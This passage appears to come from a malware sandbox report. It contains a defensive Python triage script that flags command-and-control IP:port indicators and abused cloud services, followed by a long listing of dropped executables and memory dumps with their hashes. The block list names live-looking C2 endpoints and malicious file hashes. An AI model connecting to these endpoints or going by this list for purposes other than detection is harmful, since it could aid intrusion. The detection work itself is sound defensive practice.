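# Direct C2 / payload endpoints from the report (both runs): block these.
C2_ENDPOINTS = {
    ("185.215.113.68", 80),
    ("5.42.65.125", 80),
    ("77.105.132.87", 17066),
    ("91.92.254.7", 80),
}

# Legitimate services abused in the run: alert on context, never block.
ABUSED_SERVICES = {
    "bitbucket.org",
    "bbuseruploads.s3.amazonaws.com",
    "github.com",
    "objects.githubusercontent.com",
    "api.ipify.org",
}


@dataclass
class NetEvent:
    event_id: int           # 3 = network connect, 22 = DNS query (Sysmon IDs)
    image: str              # process that generated the event
    dest_ip: str = ""
    dest_port: int = 0
    query: str = ""


def _from_user_temp(image):
    """Assumed context rule: dropped payloads in this run live under Temp."""
    return "\\appdata\\local\\temp\\" in image.lower()


def classify(event):
    """Return (kind, reason); kind is 'c2', 'abused_service' or None."""
    if event.event_id == 3 and (event.dest_ip, event.dest_port) in C2_ENDPOINTS:
        return "c2", f"{event.dest_ip}:{event.dest_port}"
    if event.event_id == 22:
        name = event.query.lower().rstrip(".")
        if name in ABUSED_SERVICES and _from_user_temp(event.image):
            return "abused_service", name
    return None, ""


def triage(events):
    """Keep only events that hit an indicator, with image, kind and reason."""
    out = []
    for event in events:
        kind, reason = classify(event)
        if kind:
            out.append((event.image, kind, reason))
    return out


def block_rules():
    """Endpoints safe to drop at the perimeter (raw-IP C2 only)."""
    return sorted(f"{ip}:{port}" for ip, port in C2_ENDPOINTS)


# Constructed sample events; which process made which connection is not
# stated in the report, so the pairings below are illustrative only.
TEMP = r"C:\Users\Admin\AppData\Local\Temp"
SAMPLE_EVENTS = [
    NetEvent(3, TEMP + r"\b67151e07936533f3b38355566e47650.exe", "185.215.113.68", 80),
    NetEvent(22, TEMP + r"\9CFB.exe", query="api.ipify.org"),
    NetEvent(22, r"C:\Program Files\Git\cmd\git.exe", query="github.com"),  # benign
    NetEvent(3, r"C:\Windows\System32\svchost.exe", "104.192.141.1", 443),  # benign
    NetEvent(3, TEMP + r"\72D0.exe", "77.105.132.87", 17066),
]

if __name__ == "__main__":
    for row in triage(SAMPLE_EVENTS):
        print(row)
    print("block:", block_rules())
```

The git.exe lookup of github.com and the svchost.exe connection to a Bitbucket address produce no hit, which is the point: the shared-service rows only become a signal when paired with an unusual source process. The port 17066 connection is the one worth a dedicated rule, since nothing legitimate on a workstation speaks to a Russian-hosted address on that port.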
Files
memory/1276-0-0x0000000000400000-0x000000000040A000-memory.dmp
memory/3440-1-0x0000000003ED0000-0x0000000003EE6000-memory.dmp
memory/1276-2-0x0000000000400000-0x000000000040A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\9CFB.exe
| MD5 | 9a747219c8fab73e2ba0541e3d86cd8b |
| SHA1 | 0723a7c85108ebd6a8141a7ce2459c35add81a0c |
| SHA256 | eb33681098da51a889200090735de67ff170fbb4adb5b01284f08821134f5f01 |
| SHA512 | acb9faf833107d7a0ff16692861b03e3c719ef60851335082e75b16a53ee073ce53418e1aa57ca8c164ebb695ffc44638bfaeb533a79e15e1d480cee34b65a83 |
memory/2492-12-0x0000000001220000-0x0000000001272000-memory.dmp
memory/2492-17-0x00000000746D0000-0x0000000074E80000-memory.dmp
memory/2492-18-0x0000000006080000-0x0000000006624000-memory.dmp
memory/2492-19-0x00000000059E0000-0x0000000005A72000-memory.dmp
memory/2492-20-0x0000000005B90000-0x0000000005BA0000-memory.dmp
memory/2492-21-0x0000000005AA0000-0x0000000005AAA000-memory.dmp
memory/2492-23-0x0000000007010000-0x0000000007628000-memory.dmp
memory/2492-24-0x0000000008890000-0x000000000899A000-memory.dmp
memory/2492-25-0x0000000006EF0000-0x0000000006F02000-memory.dmp
memory/2492-26-0x0000000006F50000-0x0000000006F8C000-memory.dmp
memory/2492-27-0x0000000006FA0000-0x0000000006FEC000-memory.dmp
memory/2492-28-0x00000000094B0000-0x0000000009516000-memory.dmp
memory/2492-29-0x000000000A3C0000-0x000000000A582000-memory.dmp
memory/2492-30-0x000000000AAC0000-0x000000000AFEC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\C7C5.exe
| MD5 | f456b770bbc80b698bdd9116a4e063fc |
| SHA1 | 7ee06483fdc2b8925282a34721af9e86b916945e |
| SHA256 | 34f87435036b847dcdc8ad7c8e613daeebebed06bfd1e62322c6b2e9dc753825 |
| SHA512 | b679876ebe59832d4491a62c4c482a763bc00ba3cfd2f8af24c4cc487e997ff94729f46ae79470d1c5357893de65f9c15d70f600e07bcf30bcc9e35c84c8da2a |
C:\Users\Admin\AppData\Local\Temp\C7C5.exe
| MD5 | 1713300ba962c869477e37e4b31e40af |
| SHA1 | d5c4835bc910acccd28dbed0c451043ea8de95ef |
| SHA256 | 2bcdb7a75707f841615be19f4bbcb95fc6b16ce19fb7ea782c5ff43ea1be024d |
| SHA512 | 70b2a2b17c6b3a0a295baf536451ef38c6e9e292a3c967a9fc950a6de321bbac0dc45e942ef151ba81b717f8ede3166388e68ce75f2afff0ec16aea98ea742e1 |
memory/5092-36-0x00000000001C0000-0x000000000065E000-memory.dmp
memory/5092-35-0x00000000746D0000-0x0000000074E80000-memory.dmp
memory/5092-37-0x0000000005160000-0x00000000051FC000-memory.dmp
memory/5092-38-0x0000000005290000-0x00000000052A0000-memory.dmp
memory/2492-39-0x0000000006A80000-0x0000000006AD0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\D469.exe
| MD5 | 71133438e300594c59ad49ccccdbac93 |
| SHA1 | 4addecdd3101ba2154504296ae5fa38d67dd34f3 |
| SHA256 | ae463362701dbf13d64de6928ede6ee7bc6b10f5ee75568a46ca56d60c58b8c4 |
| SHA512 | 63a8fa99f966404420a01c122c46ea659d206ed1754da069d4e3d7837c14af6b3c104df35818eafb7c84aa665646810f6f368dec5e3590843d5c248d55cc7930 |
C:\Users\Admin\AppData\Local\Temp\D469.exe
| MD5 | bf33c990e7c7d544a59b50910502e360 |
| SHA1 | 234c5085cb77a5be787d3969eacedba3b809d58d |
| SHA256 | 8c037d12bc707e229ea667f6e93233c1b3ff513071b51010ad55f4aa1aaf627a |
| SHA512 | 61bb3759ceeba54a36e77892a0c1a014c3216a31d615b8ec46a80f18073f0f50194045b2750c59dd4e63d71271e9b7fe2ab99335eda316987e834ca655e6a491 |
memory/3128-45-0x0000000000420000-0x0000000001212000-memory.dmp
memory/3128-44-0x00000000746D0000-0x0000000074E80000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
| MD5 | c7682b9fe7adb7f9f9c239efa65211ad |
| SHA1 | 8df9ab964910cc6db9c614b5192e705235ab8b09 |
| SHA256 | c888c8693cf5d3eb474c9d62a72edcbcc37eab11ed91d711678a8ea428e75207 |
| SHA512 | 19b17ba9516eec1e2057a038fb714dea1d8345d4ca59dbdb03a539ae0c87c721327799885101aed48418c48d0956728da279449aeb558edbfff51a47611c190b |
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
| MD5 | 7a63a9d863a7c800bc9ba3e70da9664a |
| SHA1 | d41557f5faa5d3d6a17869b574f4721a827aff2c |
| SHA256 | 9406eef91ed015793bf60f5d813497788f3defcb161494ec408c7b169d3d1da2 |
| SHA512 | 06bba648fdae40f8954ccac1163b0d85e776d0087512b7e6a4f858dc2c3c91cd9a1df70a9ea16259b34e2c846e8099e44ccc47ce0f13e502c9cdc1f255304e64 |
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
| MD5 | 62b01ec4a955eab3a7a41e2c07f18913 |
| SHA1 | 48d8e1e391fa078d78e2130481f9d35eb45a11ec |
| SHA256 | c76de2cd7f512fb4ccef14734eb63daa46c05c7e372e886381652e97dee9af56 |
| SHA512 | 725dcf11ab6140f249e570960864011d12687ce177988ae9ec378a67062509c52a343a4db80cfdb9de03200eaf66569016590c1091cbda74ca795cf24f60fb56 |
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
| MD5 | c6c53c63657293e4da62c4e7f1d1831b |
| SHA1 | a8379d445fb2226da97418f4d75bad07ef9290ca |
| SHA256 | 900c0640ba1e682128403dd48d4865aa07f3a63086c7e19bc8baa0ca79bd6cdf |
| SHA512 | 9033f375fa453f04734b22837f08d50b7c01156fce8cfc1536921afc8014015753e48280d266d8e71a5bb3b0a79572cdb82b08c921149d797c7494418ff85965 |
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
| MD5 | e64a9617b12f6c3ebeb356d55fa20a58 |
| SHA1 | de175104b56f2571338ba1c0dd293cbbb272d48b |
| SHA256 | 5f7b2a6094580ea67484885019f14a7c7c4c6b3abbd8921eec4937470b432be2 |
| SHA512 | fe1c76419fd0570eb7ec515b30ebe82da9e764b78133243a01905b2096c202b0f0e8ee4b1cf611f448697b25d5ad929244d5beb59295290d601ed951cf03474b |
C:\Users\Admin\AppData\Local\Temp\tuc3.exe
| MD5 | 41fd4e22a8a49b767e464fb00b35a0af |
| SHA1 | 6c42ff1994c3c478c20e3680b8a4933bafa41dc5 |
| SHA256 | a9c9004e7244f4db028c1ac689e0662c12fef1d6ae9e48e21498edd626736819 |
| SHA512 | a0b4b22b7a1c7420d073cf2bc11526eb5856d0d061267fdd0ac958a2e77d664a7acc4014657d060e7e4ba53be142214e63d83cb0733cfcfa9f9968546ece3a82 |
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
| MD5 | ae2972e39a22195447b4bf9f64e3f0c5 |
| SHA1 | 29341d722658114c0e24583a92d352d5d6240f3a |
| SHA256 | 2bf41e85cae1d3f565d868a44e5676ed12c3febc32d1414109850eac96d22ff1 |
| SHA512 | 7a10db21061005037bdc0fbd6770d98d48b8fcc41ef4170a3d37611c0f778547d98376eb7110fe89afeb0c308c8bf245b58f2ace79765b5ca15acc405db03455 |
C:\Users\Admin\AppData\Local\Temp\nsbD6E8.tmp\INetC.dll
| MD5 | 40d7eca32b2f4d29db98715dd45bfac5 |
| SHA1 | 124df3f617f562e46095776454e1c0c7bb791cc7 |
| SHA256 | 85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9 |
| SHA512 | 5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d |
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
| MD5 | 349b8d5ad6856904983af1ca54c6dff2 |
| SHA1 | a681ec9e944834527c5c83ae21a0e86ef42a1488 |
| SHA256 | 1cafb4a8f55864b9c6d1d33eecfc8bb91cd22b1857e7e673970e9b7cad8ed645 |
| SHA512 | 7f957e6783e74be28f9821622e3de5f1b92082bef57e999d9fc484b960ba79ed9f104c0bdeeb62b3f6fddb7a7490e5905a43958a278dcf0bfca024521a3c4e76 |
memory/2492-88-0x00000000746D0000-0x0000000074E80000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
| MD5 | 4829b8d1c37259c4938784347650b8e4 |
| SHA1 | ad2b607c717d50bfbb0afee425f6d1e3c73f28e3 |
| SHA256 | 3faff80040e71993de40cc618dce4ddd833604bf61aebb2776f490cb98dd1c17 |
| SHA512 | 422c10f4c1f4b4e157fd550b2f9f253511e6e70ebfb683be83905501d65b69e502ebf1e07c6dd30588962dfcb865a9b4843b700ba70b0efda64d6eed370116cf |
C:\Users\Admin\AppData\Local\Temp\tuc3.exe
| MD5 | aa35e48c2f112c0045ddf5f6a4322c44 |
| SHA1 | eaa8afb4d4dc9392932c925043d4ca4d93f11c04 |
| SHA256 | 4a7b00a9bcde09f29f587230214af7138af43293d1b66ebaab19f388ec4e1400 |
| SHA512 | 960b08405d2189e0787b15437fe2608660aa308b72d8a608446170e4aec1190774795b6c287bfa6be94f698440e81e55e50e5449a2fbf2c0c34197cb3ee6e85e |
memory/516-102-0x0000000002470000-0x0000000002479000-memory.dmp
memory/2320-110-0x0000000000400000-0x0000000000409000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\D91D.exe
| MD5 | dc6fbf2cd9ad1f1f0ac200e9bec7ea3f |
| SHA1 | c3af9d82d270829784339331dea63f927400e0d4 |
| SHA256 | 2337b4b50924227e6f8772d9ce4b4bdbe6b8cfff15f493ea977e7c1280ad8590 |
| SHA512 | 39307ae10cd7db4ff6da65090bf86af362955c25793dcf60cff65892aa759d3befc1180ee9039f5611f2d8393848a4f265dd34dd690161488b99c2a30b4aae2f |
memory/516-109-0x0000000000870000-0x0000000000970000-memory.dmp
memory/3492-111-0x0000000002830000-0x0000000002831000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tuc3.exe
| MD5 | a045d462a33c6e835b68fc10850e230c |
| SHA1 | b503d30d952078f859a41a195f7d0b05fd4c49a3 |
| SHA256 | f548a4b0cb7309284f72cf07a973014e58c1c6d15bdfad4c065dc60dc45ca291 |
| SHA512 | e3f276b2885ffdf8e17c18b58bb35d10561c462810ff14461747a591d0c198c153199d59ec1d822ad0eb75fe0ecf57caf4daec4d8793fed66ea3fbe12b262507 |
memory/3516-100-0x0000000000400000-0x0000000000418000-memory.dmp
memory/3128-99-0x00000000746D0000-0x0000000074E80000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\nsbD6E8.tmp\Math.dll
| MD5 | ebd8a7a5042ae1d4ce1aa9071859c851 |
| SHA1 | ee508ce7cbe8b1b0bd471bee43e1ec19d21e8ad6 |
| SHA256 | fb6a0072377325b5da0d1da236d9da2610608e9ab74318e15540cc7aca75f837 |
| SHA512 | daebecc30e91b19737b346ed7ac85ada87757f53fa67fdd262ba617b29c24ebde4058171f71bf1bc8d0d8b39a9a346c7ef2a9968908dbc16723069d8f9507b0e |
C:\Users\Admin\AppData\Local\Temp\is-KBMR3.tmp\tuc3.tmp
| MD5 | f448d7f4b76e5c9c3a4eaff16a8b9b73 |
| SHA1 | 31808f1ffa84c954376975b7cdb0007e6b762488 |
| SHA256 | 7233b85eb0f8b3aa5cae3811d727aa8742fec4d1091c120a0fe15006f424cc49 |
| SHA512 | f8197458cd2764c0b852dac34f9bf361110a7dc86903024a97c7bcd3f77b148342bf45e3c2b60f6af8198ae3b83938dbaad5e007d71a0f88006f3a0618cf36f4 |
memory/2320-113-0x0000000000400000-0x0000000000409000-memory.dmp
memory/1832-117-0x0000000002DD0000-0x00000000036BB000-memory.dmp
memory/1832-118-0x00000000029D0000-0x0000000002DCB000-memory.dmp
memory/1832-134-0x0000000000400000-0x0000000000D1C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-3Q2N2.tmp\_isetup\_iscrypt.dll
| MD5 | a69559718ab506675e907fe49deb71e9 |
| SHA1 | bc8f404ffdb1960b50c12ff9413c893b56f2e36f |
| SHA256 | 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc |
| SHA512 | e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63 |
C:\Users\Admin\AppData\Local\Temp\is-3Q2N2.tmp\_isetup\_isdecmp.dll
| MD5 | 3adaa386b671c2df3bae5b39dc093008 |
| SHA1 | 067cf95fbdb922d81db58432c46930f86d23dded |
| SHA256 | 71cd2f5bc6e13b8349a7c98697c6d2e3fcdeea92699cedd591875bea869fae38 |
| SHA512 | bbe4187758d1a69f75a8cca6b3184e0c20cf8701b16531b55ed4987497934b3c9ef66ecd5e6b83c7357f69734f1c8301b9f82f0a024bb693b732a2d5760fd303 |
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\install.bat
| MD5 | 60c9624e093baac4bef11ab4fc846111 |
| SHA1 | 07a25911c81e04608a0dc6fb065524a9da82dd65 |
| SHA256 | e60ede01e4c366eca01c0d420190370cb52fb239d508593b343912735ef51d1d |
| SHA512 | 14e031235f82bb93ba8044c2d39673094707814e67485d819eccad5d1aae972bfba6a12d7bb27d9f70e38a94c3f5152a3d49a799ca9501a64afb420bb280ff24 |
memory/4264-136-0x0000000000610000-0x0000000000611000-memory.dmp
memory/2828-171-0x00007FFE09580000-0x00007FFE0A041000-memory.dmp